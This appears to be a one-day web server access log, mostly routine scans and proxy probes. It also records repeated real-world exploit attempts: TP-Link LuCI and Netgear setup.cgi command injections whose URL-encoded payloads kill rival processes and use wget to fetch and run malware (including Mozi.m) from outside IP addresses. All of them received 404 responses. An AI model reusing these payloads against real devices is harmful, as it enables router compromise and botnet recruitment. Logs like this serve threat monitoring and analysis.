149.50.103.48 - - [22/Jun/2024:00:23:06 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [22/Jun/2024:00:34:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:00:34:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 205.210.31.236 - - [22/Jun/2024:00:40:01 +0200] "-" 400 1930 205.210.31.236 - - [22/Jun/2024:00:40:01 +0200] "-" 400 1930 45.141.86.171 - - [22/Jun/2024:00:55:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [22/Jun/2024:00:58:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.244.36.206 - - [22/Jun/2024:01:00:35 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.51 - - [22/Jun/2024:01:11:41 +0200] "GET / HTTP/1.0" 200 1895 5.10.250.35 - - [22/Jun/2024:01:19:58 +0200] "-" 400 1930 5.10.250.35 - - [22/Jun/2024:01:19:58 +0200] "-" 400 1930 5.10.250.35 - - [22/Jun/2024:01:19:58 +0200] "-" 400 1930 5.10.250.35 - - [22/Jun/2024:01:19:58 +0200] "-" 400 1930 147.185.132.102 - - [22/Jun/2024:01:40:22 +0200] "GET / HTTP/1.0" 200 1895 194.59.31.99 - - [22/Jun/2024:01:44:25 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.27 - - [22/Jun/2024:01:51:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.194 - - [22/Jun/2024:02:24:01 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.165 - - [22/Jun/2024:02:32:11 +0200] "-" 400 1930 185.100.87.136 - - [22/Jun/2024:02:46:29 +0200] "-" 400 1930 185.100.87.136 - - [22/Jun/2024:02:46:30 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 198.235.24.78 - - [22/Jun/2024:03:18:04 +0200] "GET / HTTP/1.1" 200 1895 118.123.105.93 - - [22/Jun/2024:03:47:25 +0200] "-" 400 1930 118.123.105.93 - - [22/Jun/2024:03:47:25 +0200] "GET / HTTP/1.1" 200 1895 118.123.105.93 - - [22/Jun/2024:03:47:26 +0200] "-" 400 1930 118.123.105.93 - - [22/Jun/2024:03:47:27 +0200] "-" 400 1930 118.123.105.93 - - [22/Jun/2024:03:47:27 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.123.105.93 - - [22/Jun/2024:03:47:28 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.123.105.93 - - [22/Jun/2024:03:47:29 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 746 141.98.11.15 - - [22/Jun/2024:04:02:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 218.250.115.19 - - [22/Jun/2024:04:12:41 +0200] "-" 400 1930 218.250.115.19 - - [22/Jun/2024:04:12:41 +0200] "-" 400 1930 218.250.115.19 - - [22/Jun/2024:04:12:42 +0200] "CONNECT api64.ipify.org:80 HTTP/1.1" 400 804 141.98.83.197 - - [22/Jun/2024:04:14:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:04:14:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [22/Jun/2024:05:50:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.38.182.146 - - [22/Jun/2024:06:01:44 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [22/Jun/2024:06:20:11 +0200] "GET / HTTP/1.1" 200 1895 170.231.64.75 - - [22/Jun/2024:06:21:41 +0200] "GET / HTTP/1.1" 200 1895 180.180.130.250 - - [22/Jun/2024:06:25:28 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [22/Jun/2024:06:26:29 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [22/Jun/2024:06:26:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [22/Jun/2024:06:26:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [22/Jun/2024:06:55:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [22/Jun/2024:07:30:08 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [22/Jun/2024:07:31:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:07:31:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 138.197.148.217 - - [22/Jun/2024:07:46:17 +0200] "-" 400 1930 138.197.148.217 - - [22/Jun/2024:07:46:18 +0200] "-" 400 1930 138.197.148.217 - - [22/Jun/2024:07:46:18 +0200] "GET / HTTP/1.1" 200 1895 138.197.148.217 - - [22/Jun/2024:07:46:18 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 80.76.49.133 - - [22/Jun/2024:08:12:34 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 206.217.128.98 - - [22/Jun/2024:08:52:51 +0200] "GET / HTTP/1.1" 200 1895 193.227.197.89 - - [22/Jun/2024:09:01:45 +0200] "GET / HTTP/1.0" 200 1895 185.244.36.206 - - [22/Jun/2024:09:17:44 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [22/Jun/2024:09:24:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [22/Jun/2024:09:35:12 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.45 - - [22/Jun/2024:09:36:24 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.38 - - [22/Jun/2024:09:36:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.42 - - [22/Jun/2024:09:37:04 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.38 - - [22/Jun/2024:09:37:09 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 141.98.83.197 - - [22/Jun/2024:10:02:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:10:02:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.11.15 - - [22/Jun/2024:10:27:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 200.195.160.182 - - [22/Jun/2024:10:40:13 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [22/Jun/2024:10:46:49 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [22/Jun/2024:10:46:52 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [22/Jun/2024:10:46:52 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.244.36.206 - - [22/Jun/2024:10:49:36 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [22/Jun/2024:10:53:09 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [22/Jun/2024:10:53:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [22/Jun/2024:10:53:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [22/Jun/2024:11:18:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [22/Jun/2024:12:17:29 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [22/Jun/2024:12:43:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:12:43:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 24.167.82.94 - - [22/Jun/2024:13:34:52 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [22/Jun/2024:13:41:14 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [22/Jun/2024:13:42:38 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [22/Jun/2024:13:53:23 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 185.191.126.213 - - [22/Jun/2024:14:02:52 +0200] "GET / HTTP/1.1" 200 1895 45.156.128.43 - - [22/Jun/2024:14:18:41 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 743 149.50.103.48 - - [22/Jun/2024:15:18:35 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [22/Jun/2024:15:22:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.83.197 - - [22/Jun/2024:15:26:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:15:26:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 103.252.136.86 - - [22/Jun/2024:15:34:34 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [22/Jun/2024:15:45:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [22/Jun/2024:16:06:09 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 13.56.194.55 - - [22/Jun/2024:16:17:11 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [22/Jun/2024:16:33:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [22/Jun/2024:16:33:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.88.91.41 - - [22/Jun/2024:16:51:34 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 149.50.103.48 - - [22/Jun/2024:17:15:56 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [22/Jun/2024:17:20:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [22/Jun/2024:17:20:10 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [22/Jun/2024:17:20:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 123.58.207.127 - - [22/Jun/2024:17:29:25 +0200] "-" 400 1930 123.58.207.127 - - [22/Jun/2024:17:29:35 +0200] "GET / HTTP/1.1" 200 1895 123.58.207.127 - - [22/Jun/2024:17:29:53 +0200] "GET /favicon.ico HTTP/1.1" 404 729 123.58.207.127 - - [22/Jun/2024:17:29:53 +0200] "GET /robots.txt HTTP/1.1" 404 728 123.58.207.127 - - [22/Jun/2024:17:29:53 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 141.98.83.197 - - [22/Jun/2024:17:48:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:17:48:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [22/Jun/2024:18:04:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 138.197.46.35 - - [22/Jun/2024:18:06:33 +0200] "-" 400 1930 138.197.46.35 - - [22/Jun/2024:18:06:33 +0200] "-" 400 1930 138.197.46.35 - - [22/Jun/2024:18:06:33 +0200] "GET / HTTP/1.1" 200 1895 138.197.46.35 - - [22/Jun/2024:18:06:33 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 149.50.103.48 - - [22/Jun/2024:19:10:19 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [22/Jun/2024:19:44:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 152.32.213.86 - - [22/Jun/2024:20:05:28 +0200] "GET / HTTP/1.1" 200 1895 152.32.213.86 - - [22/Jun/2024:20:05:29 +0200] "-" 400 1930 104.168.70.165 - - [22/Jun/2024:20:08:50 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [22/Jun/2024:20:13:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [22/Jun/2024:20:13:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 59.99.216.226 - - [22/Jun/2024:20:22:32 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.99.216.226:59362/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 149.50.103.48 - - [22/Jun/2024:20:44:49 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [22/Jun/2024:20:46:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [22/Jun/2024:20:46:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 198.235.24.206 - - [22/Jun/2024:21:52:42 +0200] "GET / HTTP/1.0" 200 1895 172.169.106.38 - - [22/Jun/2024:21:59:38 +0200] "-" 400 1930 87.121.69.27 - - [22/Jun/2024:22:31:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 147.185.132.39 - - [22/Jun/2024:22:51:40 +0200] "-" 400 1930 147.185.132.39 - - [22/Jun/2024:22:51:40 +0200] "-" 400 1930 164.90.170.123 - - [22/Jun/2024:22:52:34 +0200] "-" 400 1930 164.90.170.123 - - [22/Jun/2024:22:53:39 +0200] "GET /hello HTTP/1.1" 404 723 141.98.11.15 - - [22/Jun/2024:23:14:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [22/Jun/2024:23:22:06 +0200] "GET / HTTP/1.1" 200 1895 45.141.86.171 - - [22/Jun/2024:23:24:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.227.254.8 - - [22/Jun/2024:23:44:16 +0200] "-" 400 1930